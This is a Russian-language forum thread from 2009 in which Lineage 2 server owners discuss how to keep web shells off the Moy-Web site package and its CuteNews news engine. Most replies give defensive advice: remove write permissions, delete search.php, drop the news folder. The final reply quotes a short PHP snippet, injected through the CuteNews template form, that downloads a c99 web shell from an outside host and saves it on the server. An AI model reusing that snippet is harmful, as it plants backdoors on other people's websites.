Skip to content
La2Base
Home
DownloadsWikiForumFAQ
Search
ruen
Sign up Login
HomeFilesWikiLogin
  • Home
  • Downloads
  • Wiki
  • FAQ
  • Contact Us
  • About
  • Rules
  • Privacy
  • Terms of Service

© 2026 la2base.com · All rights reserved

ruen
Forum/Web обвязка/[question]Шеллы
Search

[question]Шеллы

8 replies153 viewsCurrently viewing: 1
SomeSay
SomeSay

User

Бывалый

Posts: 341

На форуме с: 02/27/2007

Репутация: +40

Рейтинг: 0

· 04/29/2009, 09:55 AM

У меня такой вопрос:

Я использую обвязку Moy-Web, но как известно она очень уязвима.При мне залили шелла в папку news, даже когда я ее переименовывал все равно заливали.(Слава богу это было намерено по моей просьбе для теста).

Итак вопрос : Как защитить Moy-web от заливания файлов на него?

— рас!11рас!1

0
-=[BloodKill]=-
-=[BloodKill]=-

User

Ветеран

Posts: 1355

На форуме с: 09/01/2008

Репутация: +1179

Рейтинг: 0

· 04/29/2009, 09:59 AM

Somesay: У меня такой вопрос:

Я использую обвязку Moy-Web, но как известно она очень уязвима.При мне залили шелла в папку news, даже когда я ее переименовывал все равно заливали.(Слава богу это было намерено по моей просьбе для теста).

Итак вопрос : Как защитить Moy-web от заливания файлов на него?

cutenews удали

— Оо

0
morfeus
morfeus

User

Ветеран

Posts: 608

На форуме с: 10/25/2008

Репутация: +218

Рейтинг: 0

· 04/29/2009, 10:10 AM

chmod убираем право на запись......

— Perpetuum Mobile

0
SomeSay
SomeSay

User

Бывалый

Posts: 341

На форуме с: 02/27/2007

Репутация: +40

Рейтинг: 0

· 04/29/2009, 10:22 AM

-=[BloodKill]=-: cutenews удали


Если я его удалю, то как добавлять новости?

morfeus: chmod убираем право на запись......


Как это сотворить?

— рас!11рас!1

0
St1ng3r
St1ng3r

User

Ветеран

Posts: 537

На форуме с: 02/05/2008

Репутация: +262

Рейтинг: 0

· 04/29/2009, 11:43 AM

Удалить search.php в cutenews, так же для безопасности убирать права на запись после добавления новостей.
Права редактируются через ftp.

0
SomeSay
SomeSay

User

Бывалый

Posts: 341

На форуме с: 02/27/2007

Репутация: +40

Рейтинг: 0

· 04/29/2009, 12:39 PM

Search.php удалил как установил обвяз.

Права на запись снял, но всеравно не помогает...

— рас!11рас!1

0
Руслан
Руслан

Moderator

Ветеран

Posts: 1201

На форуме с: 12/14/2007

Репутация: +775

Рейтинг: 0

· 04/29/2009, 06:56 PM

Единственный способ обезопасить МВ - удалить ее mda.gif

По теме ответ дан - удалить папку News (новости в таком случае добавлять либо руками, либо используя более безопасный новостной движок) и по закрывать пару дыр.
Какие - уже обсуждалось на форуме.

На Форуме я тоже Radar!
Я везде Radar!

0
A
antarius

User

Новичок

Posts: 15

На форуме с: 04/01/2009

Репутация: +10

Рейтинг: 0

· 04/30/2009, 08:08 PM

Или поставить ДЛЕ и не парить мосх.
Дам совет смени логин с root на какой тока сможеш придумать в коментах чтоб тока не ставились как бэ куй он зальёт шелл через шаблон.

Заливаетцо шелл в шаблоны через форму:
HTML;
$data=implode('',file('http://--/с99.php'));
$fp=fopen('./file.php','wb');
fputs($fp,$data);
fclose($fp);
удалить search.php
И не плохобы написать версию кутеневса тут не телепаты они в отпуске)

0
Topic is closed for replies